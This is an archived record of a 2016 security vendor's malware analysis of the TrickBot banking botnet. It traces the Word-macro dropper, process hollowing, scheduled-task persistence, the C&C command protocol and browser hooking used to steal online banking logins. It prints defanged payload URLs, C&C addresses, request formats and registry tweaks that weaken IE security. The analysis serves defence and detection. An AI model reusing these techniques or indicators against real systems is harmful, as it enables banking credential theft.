{
	"id": "a502c545-2408-44c7-b139-a4d1bc045f44",
	"created_at": "2026-04-06T00:20:05.193698Z",
	"updated_at": "2026-04-10T03:20:33.574866Z",
	"deleted_at": null,
	"sha1_hash": "2ab87828d49e26fcea473a49b8491de7e39e4024",
	"title": "Deep Analysis of the Online Banking Botnet TrickBot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1895957,
	"plain_text": "Deep Analysis of the Online Banking Botnet TrickBot\r\nBy Xiaopeng Zhang\r\nPublished: 2016-12-06 · Archived: 2026-04-02 10:39:31 UTC\r\nOne month ago we captured a Word document infected with malicious VBA code, which was detected as\r\nWM/Agent!tr by the Fortinet AntiVirus service. Its file name is InternalFax.doc, and its MD5 is\r\n4F2139E3961202B1DFEAE288AED5CB8F .  By our analysis, the Word document was used to download and spread the\r\nbotnet TrickBot. TrickBot aims at stealing online banking information from browsers when victims are visiting\r\nonline banks. The targeted banks are from Australia, New Zealand, Germany, United Kingdom, Canada, United\r\nStates, Israel, and Ireland, to name a few.\r\nHow TrickBot is downloaded to the victim’s system\r\nWhen a victim opens the malicious Word document, Figure 1 shows what the document looks like:\r\nFigure 1. The Word document is opened\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 1 of 20\n\nAs you can see, a warning message is shown in the foreground. However, in the background, its VBA code is\r\ndownloading the TrickBot sample from hxxp://fax-download.com/lindoc1.exe or\r\nhxxp://futuras.com/dodocdoddus.exe.  Figure 2, below, shows the downloaded TrickBot sample. Its MD5 is\r\nD58CD6A8D6632EDCB6D9354FB094D395 , and can be detected as W32/Generik.LWVNLMZ!tr by Fortinet AntiVirus\r\nservice.\r\nFigure 2. The downloaded TrickBot sample\r\nTrickBot is installed on victim’s system\r\nThe original TrickBot is a program developed with Visual Basic 6.0. To increase the difficulty of debugging and\r\nanalyzing it, the malware developer used a large number self-defense techniques, including code self-modification, code dynamic-extraction, and code/data encryption, etc. Let’s go ahead and see how it works.\r\nWhen TrickBot is launched it dynamically extracts code from itself, puts it into a heap space, then calls its entry\r\npoint. The main purpose is to call the Windows API CreateProcessW to run as a child process with the creation\r\nflag “CREATE_SUSPENDED.” This means that when the new process is created successfully, it’s in suspended\r\nstatus. So the malware could get a chance to modify the child process’ code as expected, then send the child\r\nprocess a signal by calling an API to let it resume and run the modified code. This is usually what the malware\r\ndoes to protect its code. Figure 3 shows the calling of the API CreateProcessW.\r\nFigure 3.  Call CreateProcessW with CREATE_SUSPENDED flag\r\nAs mentioned above, it’ll call ZwUnmapViewOfSection, ZwAllocateVirtualMemory, ZwWriteVirtualMemory,\r\nZwGetContextThread, ZwSetContextThread and ZwResumeThread APIs to modify the child process’ code. It then\r\nmodifies the thread context and finally resumes its execution. After that, the parent process finishes its job and is\r\ngoing to exit soon. From now on, the code in the child process will take over and continue the TrickBot’s job.\r\nLet’s move on and see how the child process works.\r\nActually, the child process is a loader, which loads a named resource from itself into heap space. Of course, the\r\ncontent of the resource is encrypted, but after decryption it  appears as an executable code block. Soon the child\r\nprocess will call the executable’s entry point. The named resource is “IDR_X86BOT” or “IDR_X64BOT.” It\r\ndepends on whether the victim’s system is 32-bit or 64-bit. In our analysis, according to the system type, the\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 2 of 20\n\nnamed resource is “IDR_X86BOT”. This also affects what executable files are downloaded from the C\u0026C server\r\nlater.\r\nThe code in heap contains the main job of the child process. At first it creates a named mutex object by calling the\r\nfunction CreateMutex . This is used to check if another lindoc1.exe is running. If yes, it stops doing other things\r\nand exits the process. In this way, it can ensure that only one lindoc1.exe can be run at one time. The following\r\nASM code snippet shows how the named mutex object is created.\r\nNext, TrickBot tries to add itself as a task named “Bot” to the Task Scheduler, so that the TrickBot can be\r\nexecuted in a timely manner. Figure 4 and 5 show the screenshots of TrickBot’s task in Task Scheduler.\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 3 of 20\n\nFigure 4. New Task “Bot” in Task Scheduler\r\nFigure 5. The action of the TrickBot task\r\nThe task named “Bot” is able to start “lindoc1.exe” with “SYSTEM” account permission. As you might notice,\r\nthe original “lindoc1.exe” has been moved to\r\n“C:\\Windows\\system32\\config\\systmprofile\\AppData\\Roaming\\lindoc1.exe” because this folder is just like\r\n“%AppData%” for local “SYSTEM” account.\r\nTrickBot creates a security identity (SID) to check if the user running this process is “SYSTEM”. If not, then it\r\nwill soon exit the process. See the following code snippet for detailed info on how it checks the account.\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 4 of 20\n\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 5 of 20\n\nOf course, the current account is owned the user who signed into Windows, and not “SYSTEM.” As you may\r\nrecall, only when TrickBot is executed by the Task Scheduler, the account is “SYSTEM” (see Figure 4.) So the\r\nchild process exits itself without doing any further things.\r\nTrickBot is executed by Task Scheduler\r\nWhen TrickBot is executed by the Task Scheduler with “SYSTEM” account permission, it can pass the SID\r\ncheck. It then tries to get victim’s public IP address by sending following HTTP requests.\r\nThe public IP address will be used for communication with C\u0026C server later.\r\nIt should be noted that most of the data, meaning files generated by TrickBot, are encrypted. TrickBot continually\r\nloads encrypted resource data with the name “CONFIG.” After decryption, it contains some information about\r\nTrickBot, including its version, group tag, and the IP addresses of its C\u0026C servers. All this information is used to\r\ncommunicate with its C\u0026C servers. If there is already a “config.conf” file, it reads the file and decrypts it to get\r\nthe “CONFIG” data instead. The content looks like this:\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 6 of 20\n\nAfter the IP addresses of C\u0026C servers are received, TrickBot will connect them. I’m going to take one request as\r\nan example to show you what the command looks like:\r\nGET /lindoc1/AAA-PC_W617600.CA836C89ADF141D19A16BFA7397AD021/5/spk/\r\n“lindoc1” is the group tag.\r\n“AAA-PC_W617600.CA836C89ADF141D19A16BFA7397AD021” is the client id that is generated by\r\ncurrent user name, Windows version and 32 random hexadecimals.\r\n“5” is the command id. According to my analysis, command 5 is used to request downloading something\r\nfrom the C\u0026C server, so the server will reply with data to this command.\r\n“spk” is an additional information  for command 5.\r\nNext, I’m going to show the requests and responses of some main commands in chronological order. In the\r\nrequests I use “Client_ID” to replace the real long client id in order to reduce the request length. Note that the\r\nresponse data are all encrypted, so I decrypted them here for readability.\r\n[Command 0 request]:\r\nGET /lindoc1/Client_ID/0/Windows7x86/1012/PUBLIC\r\nIP/BC1A53480DD53727D4E197BC8DF20B0E8D113AA14C\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 7 of 20\n\nThis provides the C\u0026C server with the Windows version, and the public IP address of the victim’s machine. The\r\nserver then replies with an expiration time and new IP address, which are used to download DLLs later.\r\n[Response]:\r\n“1480550400” is a date/time value. After conversion it’s “16:00 11/30 2016.” It tells us the C\u0026C server’s\r\nexpiration date and time. The IP address and port “37.1.213.189:447” points to a specific C\u0026C server that holds\r\nthe DLL files.\r\n[Command 23 request]:\r\nGET /lindoc1/Client_ID /23/1000004/\r\nThis sends the TrickBot version to the C\u0026C server to fetch the latest “CONFIG” of the C\u0026C server. When\r\nTrickBot runs into any errors in connecting to the C\u0026C server, it’ll send such request. As you can see, the latest\r\nversion for now is 1000008. It’s going to replace the previous “CONFIG” data as well. Also, the original response\r\ndata is saved in (or replaced, if it existed) “config.conf,” which is checked first when it’s executed next time.\r\n[Response]:\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 8 of 20\n\n[Command 5/systeminfo]:\r\nGET /lindoc1/Client_ID/5/systeminfo32/\r\nWhen the victim’s system type is 32 bit, it sends command 5 to download “systeminfo32,” a 32-bit DLL that is\r\nused to steal the victim’s system information. “systeminfo64” is for 64-bit systems. The request is sent to a C\u0026C\r\nserver, whose IP address and port are obtained from Command 0’s response. In my analysis, it is\r\n“37.1.213.189:447.” The encrypted systeminfo32 is saved as “.\\Modules\\systeminfo32.”\r\nLater, it is executed in a newly-created process, “svchost.exe,” which focuses on collecting the victim’s system\r\ninformation, including its Windows version, CPU type, RAM capacity, user accounts, installed software, and\r\nservices. Here is the system information collected from my testing system.\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 9 of 20\n\nLater, the data is sent to a C\u0026C server as body part of command 63 POST request, like this:\r\nPOST lindoc1/CLIENT_ID/63/systeminfo/GetSystemInfo/c3VjY2Vzcw==/systeminfo\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 10 of 20\n\n[Command 5/injectDll]:\r\nGET /lindoc1/Client_ID/5/injectDll32/\r\nThis is a command 5 “Get” request to download injectDll32 file from the C\u0026C server whose IP address comes\r\nfrom Command 0’s response i.e. “37.1.213.189:447.” The encrypted injectDll32 is saved as\r\n“.\\Modules\\injectDll32.” In my analysis, this is a very important DLL, which finally is able to inject malicious\r\ncode into web browsers (IE, Chrome and Firefox) or to monitor the victim’s online banking. I will explain how it\r\nworks in a later section.\r\n[Command 5/sinj]:\r\nGET /lindoc1/Client_ID/5/sinj/\r\nThis is kind of a configuration file for “injectDll”. It contains many online banks. The encrypted response data is\r\nsaved in “.\\Modules\\injectDll32_configs\\sinj”.\r\n[Command 5/dinj]:\r\nGET /lindoc1/Client_ID/5/dinj/\r\nThis command will going to download “dinj” file. It’s another configuration file for “injectDll” that also contains\r\nonline bank information. It’ll be saved in “.\\Modules\\injectDll32_configs\\dinj.”\r\nBelow is an example.\r\n[Command 5/dpost]:\r\nGET /lindoc1/Client_ID/5/dpost/\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 11 of 20\n\nThis command downloads a dpost file from C\u0026C server, which contains another IP address and port that will\r\nwork together with dinj. When the banks in the dinj file are matched, some stolen bank information will be sent to\r\nthis IP address. It’s also saved as “.\\Modules\\injectDll32_configs\\dpost.” The content of this file looks like this:\r\nhxxp://188.138.1.53:8082\r\n[Command 25]:\r\nGET /lindoc1/Client_ID/25/zm9ew0pP4BD8HxR5zzem/\r\nCommand 25 is used to get a new link to a bin file. The bin file is going to be the new version of TrickBot. Before\r\nexiting this child process, the downloaded bin file will replace the old TrickBot and gets executed by calling the\r\nCreateProcessW function. In this way it can update itself automatically. During my analysis I could see that the\r\ndownloaded bin has been changed many times. They include:\r\nhxxp://substan.merahost.ru/fog.bin\r\nhxxp://susan.merahost.ru/sonya.bin\r\nhxxp://susan.merahost.ru/shevchenko.bin\r\nhxxp://susan.merahost.ru/kabzon.bin\r\nhxxp://susanlaneg.temp.swtest.ru/kabzon2.bin\r\nhxxp://susanlaneg.temp.swtest.ru/peter.bin\r\nhxxp://susanlanegh.shn-host.ru/roma.bin\r\nHow injectDll steals online banking information\r\nTrickBot keeps updating its config files from time to time. In the latest version of sinj and dinj files, it tries to steal\r\nonline bank information from dozens of banks.\r\nWhen injectDll32 is executed by svchost.exe, it enumerates all running processes to check if it’s a browser by\r\ncomparing process names. See the following code snippet for the details.\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 12 of 20\n\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 13 of 20\n\nFrom the above code, we know it only focuses on “Chrome”, “IE” and “Firefox” browsers. After it picks one\r\nprocess it uses the process ID to make a combination with a constant string as the name of pipe. This named pipe\r\nis then used to communicate between svchost.exe and the browser to transfer the content of sinj, dinj and dport.\r\nThen injectDll prepares the code that will be injected into browser, and calls CreateRemoteThread to execute the\r\ninjected code. This can be seen in the following code snippet.\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 14 of 20\n\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 15 of 20\n\nOn the browser side, it creates several thread functions. One is to communicate with injectDll32 by named pipe,\r\nand others are to set Hook functions on some HTTP-related API functions and the keyboard.\r\nIt also creates the following registry entries, so that IE can be hooked and monitored better:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\2500 = DWORD:3\r\nHKCU \\Software\\Microsoft\\Internet Explorer\\Main\\TabProcGrowth = DWORD:0\r\nHKCU \\Software\\Microsoft\\Internet Explorer\\Main\\NoProtectedModeBanner = DWORD:1\r\nIn thread function1, it sends commands to the svchost.exe by that named pipe, to transfer bank information (i.e.\r\nthe content of sinj, dinj and dpost) to browser. Later in thread function2, it is going to set some hooks on WinINet\r\nand Nss3 APIs. In this way, the injected code can capture all HTTP requests from the browsers. Then the local\r\nhook functions are able to do further filtering on the HTTP requests with the bank information. If the HTTP\r\nrequest matches the listed banks, this HTTP request will be copied and sent to the C\u0026C server. Let’s see what\r\nfunctions are hooked.\r\nFor WinINet:\r\nFor Nss3:\r\nFollowing 2 screenshots show the original entry code and the hooked entry code of HttpSendRequestA.\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 16 of 20\n\nFigure 6. Original entry code of HttpSendRequestA\r\nFigure 7. Hooked entry code of HttpSendRequestA\r\nIt also sets a global keyboard hook so that it can monitor and collect the victim’s keyboard input. In this hook\r\nfunction it checks to see if the keyboard input is from the browser controls. Figure 8 shows how the global\r\nkeyboard hook is set.\r\nFigure 8. Set global keyboard hook\r\nI’m going to now provide a real example to explain how the online banking login information is stolen, modified,\r\nand sent to its C\u0026C server. The example I’ll use is an online bank that is from sinj. As I understand, “sinj” means\r\nstatic injection and “dinj” is dynamic injection.\r\nHere we go. First, we open IE and go to the login page. Enter testing Customer ID “0903670001” and User ID\r\n“1234567890,” as shown in Figure 9.\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 17 of 20\n\nFigure 9. Online bank’s login page\r\nWhen we click the “Continue” button, it will send such POST request:\r\nThe data is captured by local hook function of HttpSendRequestW and later it is modified as this:\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 18 of 20\n\nAs you may have noticed, the strings in green are modified or newly added. The string in yellow is the data that I\r\nentered on the bank’s login page. It will be sent to the C\u0026C server, whose IP address and port are from command\r\n23’s response.\r\nTrickBot flow charts\r\nHere are the flow charts that show how TrickBot is executed on the victim’s machine. \r\n                    ‘\r\nFigure 10.  TrickBot is first executed\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 19 of 20\n\nFigure 11. TrickBot is executed by Task Scheduler\r\nConclusion\r\nThrough this analysis, we know how TrickBot installs itself on victim’s machine, and how it communicates with\r\nthe C\u0026C server, as well as what and how it steals online banking information from the victim’s browser, and\r\nfinally how it upgrades itself from time to time.\r\nFortinet has published an IPS signature, “Trick.Botnet” to detect the communication between TrickBot and its\r\nC\u0026C servers.\r\nSource: http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot"
	],
	"report_names": [
		"deep-analysis-of-the-online-banking-botnet-trickbot"
	],
	"threat_actors": [],
	"ts_created_at": 1775434805,
	"ts_updated_at": 1775791233,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2ab87828d49e26fcea473a49b8491de7e39e4024.pdf",
		"text": "https://archive.orkl.eu/2ab87828d49e26fcea473a49b8491de7e39e4024.txt",
		"img": "https://archive.orkl.eu/2ab87828d49e26fcea473a49b8491de7e39e4024.jpg"
	}
}